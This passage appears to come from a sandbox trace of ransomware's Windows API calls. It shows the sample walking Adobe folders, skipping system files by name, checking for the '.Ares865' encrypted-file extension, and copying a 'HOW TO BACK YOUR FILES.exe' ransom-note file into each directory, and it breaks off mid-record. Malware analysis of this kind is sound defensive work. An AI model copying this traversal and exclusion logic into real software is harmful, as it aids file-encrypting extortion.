lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.224] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.225] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.225] GetLastError () returned 0x0 [0106.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.225] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.225] CloseHandle (hObject=0x120) returned 1 [0106.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.225] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.225] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.225] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.225] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.225] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.226] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.226] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.226] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.226] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.226] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.226] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="aoldtz.exe") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2=".") returned 1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="..") returned 1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="windows") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="bootmgr") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="temp") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="pagefile.sys") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="boot") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="ids.txt") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="ntuser.dat") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="perflogs") returned -1 [0106.226] lstrcmpiW (lpString1="Acrobat", lpString2="MSBuild") returned -1 [0106.226] lstrlenW (lpString="Acrobat") returned 7 [0106.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*") returned 205 [0106.226] lstrcpyW (in: lpString1=0x2cce598, lpString2="Acrobat" | out: lpString1="Acrobat") returned="Acrobat" [0106.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0106.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a8) returned 0x2f4fc8 [0106.226] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0106.226] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 1 [0106.226] lstrcmpiW (lpString1="Color", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.226] lstrcmpiW (lpString1="Color", lpString2="aoldtz.exe") returned 1 [0106.226] lstrcmpiW (lpString1="Color", lpString2=".") returned 1 [0106.226] lstrcmpiW (lpString1="Color", lpString2="..") returned 1 [0106.226] lstrcmpiW (lpString1="Color", lpString2="windows") returned -1 [0106.227] lstrcmpiW (lpString1="Color", lpString2="bootmgr") returned 1 [0106.227] lstrcmpiW (lpString1="Color", lpString2="temp") returned -1 [0106.227] lstrcmpiW (lpString1="Color", lpString2="pagefile.sys") returned -1 [0106.227] lstrcmpiW (lpString1="Color", lpString2="boot") returned 1 [0106.227] lstrcmpiW (lpString1="Color", lpString2="ids.txt") returned -1 [0106.227] lstrcmpiW (lpString1="Color", lpString2="ntuser.dat") returned -1 [0106.227] lstrcmpiW (lpString1="Color", lpString2="perflogs") returned -1 [0106.227] lstrcmpiW (lpString1="Color", lpString2="MSBuild") returned -1 [0106.227] lstrlenW (lpString="Color") returned 5 [0106.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 211 [0106.227] lstrcpyW (in: lpString1=0x2cce598, lpString2="Color" | out: lpString1="Color") returned="Color" [0106.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0106.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a4) returned 0x2f5180 [0106.227] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0106.227] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.227] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.227] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0106.227] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.227] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0106.227] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5180 | out: hHeap=0x2b0000) returned 1 [0106.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0106.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned 209 [0106.227] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.227] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.227] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.228] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.228] GetLastError () returned 0x0 [0106.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.228] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.228] CloseHandle (hObject=0x120) returned 1 [0106.229] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.229] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.229] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.229] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.229] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.229] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.229] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.229] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.229] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.229] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.229] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.229] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACECache11.lst.Ares865", cAlternateFileName="ACECAC~1.ARE")) returned 1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="aoldtz.exe") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2=".") returned 1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="..") returned 1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="windows") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="bootmgr") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="temp") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="pagefile.sys") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="boot") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="ids.txt") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="ntuser.dat") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="perflogs") returned -1 [0106.229] lstrcmpiW (lpString1="ACECache11.lst.Ares865", lpString2="MSBuild") returned -1 [0106.229] lstrlenW (lpString="ACECache11.lst.Ares865") returned 22 [0106.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\*") returned 211 [0106.230] lstrcpyW (in: lpString1=0x2cce5a4, lpString2="ACECache11.lst.Ares865" | out: lpString1="ACECache11.lst.Ares865") returned="ACECache11.lst.Ares865" [0106.230] lstrlenW (lpString="ACECache11.lst.Ares865") returned 22 [0106.230] lstrlenW (lpString="Ares865") returned 7 [0106.230] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0106.230] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.230] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.230] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="aoldtz.exe") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="windows") returned -1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="bootmgr") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="temp") returned -1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="pagefile.sys") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="boot") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="ids.txt") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="ntuser.dat") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="perflogs") returned 1 [0106.230] lstrcmpiW (lpString1="Profiles", lpString2="MSBuild") returned 1 [0106.230] lstrlenW (lpString="Profiles") returned 8 [0106.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\ACECache11.lst.Ares865") returned 232 [0106.230] lstrcpyW (in: lpString1=0x2cce5a4, lpString2="Profiles" | out: lpString1="Profiles") returned="Profiles" [0106.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0106.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1b6) returned 0x2cc760 [0106.230] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0106.230] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 0 [0106.230] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.230] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0106.231] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0106.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0106.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned 218 [0106.231] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.231] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.231] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.231] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.232] GetLastError () returned 0x0 [0106.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.232] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.232] CloseHandle (hObject=0x120) returned 1 [0106.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.232] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.232] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.232] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.232] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.232] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.232] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.232] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.232] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.232] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.232] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.232] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4fee4640, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, 